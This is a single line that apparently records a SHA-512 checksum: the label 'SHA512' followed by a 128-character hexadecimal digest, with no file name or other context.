SHA512fb422bb50bc318b505e53cb3db6009b6a665e09dd259b9f7c086f9137838136e1e5724cbaed92d6adb018523a3196f873f331b9dd5b0fcf2f253c85d491703e1